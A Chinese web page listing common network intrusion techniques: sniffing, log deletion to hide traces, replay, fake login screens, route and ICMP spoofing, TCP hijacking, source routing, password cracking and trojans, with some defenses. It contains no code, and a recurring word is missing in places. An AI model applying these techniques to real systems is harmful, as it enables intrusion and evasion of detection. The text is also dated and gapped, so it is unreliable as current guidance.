SIXEL SIXEL图形文件
SYS 系统图片文件
TJL 当有不寻常事件发生的时候,所产生的日志文件。
TMP 临时文件
TPU 编辑命令文件
TXT 文本输入文件
UAF 用户授权文件
篇10:入侵常见技术大曝光
混水摸鱼DD以太网广播攻击
将以太网接口置为乱模式(promiscuous),截获局部范围的所有数据包,为我所用,
金蝉脱壳DD删除系统运行日志
攻击者攻破系统后,常删除系统运行日志,隐藏自己的痕迹,以便日后再次入侵。
借尸还魂DD重新发送(Replay)攻击
收集特定的IP数据包,篡改其数据,然后再一一重新发送,欺骗接收的主机。
笑里藏刀DD远端操纵
缺省的登录界面(shellscripts)、配置和客户文件是另一个问题区域,它们提供了一个简单的方法来配置一个程序的执行环境。这有时会引起远端操纵的攻击:在被攻击主机上启动一个可执行程序,该程序显示一个伪造的登录界面。当用户在这个伪装的界面上输入登录信息(用户名、密码等)后,该程序将用户输入的信息传送到攻击者主机,然后关闭界面给出提示信息说“系统故障”,要求用户重新登录。此后,才会出现真正的登录界面。在我们能够得到新一代更加完善的操作系统版本之前,类似的攻击仍会发生。防火墙的一个重要作用就是防止非法用户登录到受保护网的主机上。例如可以在进行报文过滤时,禁止外部主机Telnet登录到内部主机上。
无中生有DD伪造信息攻击
通过发送伪造的路由信息,构造系统源主机和目标主机的虚假路径,从而使流向目标主机的数据包均经过攻击者的系统主机。这样就给人提供敏感的信息和有用的密码。
得陇望蜀DD“跳跃式”攻击
现在许多站点使用UNIX操作系统。 们会设法先登录到一台UNIX的主机上,通过该操作系统的漏洞来取得系统特权,然后再以此为据点访问其余主机,这被称为“跳跃”(IslandDhopping)。 们在达到目标主机之前往往会这样跳几次。
例如一个在美国的 在进入美联邦调查局的网络之前,可能会先登录到亚洲的一台主机上,再从那里登录到加拿大的一台主机,然后再跳到欧洲,最后从法国的一台主机向联邦调查局发起攻击。这样被攻击网络即使发现了 是从何处向自己发起攻击,管理人员也很难顺藤摸瓜找回去,更何况 在取得某台主机的系统特权后,可以在退出时删掉系统日志,把“藤”割断。你只要能够登录到UNIX系统上,就能相对容易成为超级用户,这使得它同时成为 和安全专家们的关注点。
偷梁换柱DD窃取TCP协议连接
网络互连协议也存在许多易受攻击的地方。而且互连协议的最初产生本来就是为了更方便信息的交流,因此设计者对安全方面很少甚至不去考虑。针对安全协议的分析成为攻击的最厉害一招。
在几乎所有由UNIX实现的协议族中,存在着一个久为人知的漏洞,这个漏洞使得窃取TCP连接成为可能。当TCP连接正在建立时,服务器用一个含有初始序列号的答报文来确认用户请求。这个序列号无特殊要求,只要是唯一的就可以了。客户端收到回答后,再对其确认一次,连接便建立了。
TCP协议规范要求每秒更换序列号25万次,
但大多数的UNIX系统实际更换频率远小于此数量,而且下一个更换的数字往往是可以预知的。而 正是有这种可预知服务器初始序列号的能力使得攻击可以完成。
惟一可以防治这种攻击的方法是使初始序列号的产生更具有随机性。最安全的解决方法是用加密算法产生初始序列号。额外的CPU运算负载对现在的硬件速度来说是可以忽略的。
暗渡陈仓DD针对信息协议弱点攻击
IP地址的源路径选项允许IP数据包自己选择一条通往系统目的主机的路径。设想攻击者试图与防火墙后面的一个不可到达主机A连接。他只需要在送出的请求报文中设置IP源路径选项,使报文有一个目的地址指向防火墙,而最终地址是主机A。当报文到达防火墙时被允许通过,因为它指向防火墙而不是主机A。防火墙的IP层处理该报文的源路径被改变,并发送到内部网上,报文就这样到达了不可到达的主机A。
调虎离山DD对ICMP报文的攻击
尽管比较困难, 们有时也使用ICMP报文进行攻击。重定向消息可以改变路由列表,路由器可以根据这些消息建议主机走另一条更好的路径。攻击者可以有效地利用重定向消息把连接转向一个不可靠的主机或路径,或使所有报文通过一个不可靠主机来转发。
对付这种威胁的方法是对所有ICMP重定向报文进行过滤,有的路由软件可对此进行配置。单纯地抛弃所有重定向报文是不可取的:主机和路由器常常会用到它们,如一个路由器发生故障时。
口令入侵
所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档。不过现在很多 已经大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深入了解系统的内部结构,是初学者的好方法。
特洛伊木马
说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助 完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦用户触发该程序,那么依附在内的 指令代码同时被激活,这些代码往往能完成 指定的任务。由于这种入侵法需要 有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它的复杂性,一般的系统管理员很难发现。
监听法
这是一个很实用但风险也很大的 入侵方法,但还是有很多入侵系统的 采用此类方法,正所谓艺高人胆大。
网络节点或工作站之间的交流是通过信息流的传送得以实现,而当在一个没有集线器的网络中,数据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:“嗨!你们中有谁是我要发信息的工作站?”此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。”连接就马上完成。
此外常用的入侵方法还有EDmail技术、病毒技术和隐藏技术等。世界各地的 们正以飞快的速度创造出各种最新的入侵技术,真可谓“道高一尺,魔高一丈”,令人防不胜防。
★ 经典入侵招数
★ 跨服口号
★ 跨界作文范文
★ 入侵几种方法介绍
★ 档案详解
跨站入侵技术详解(共10篇)




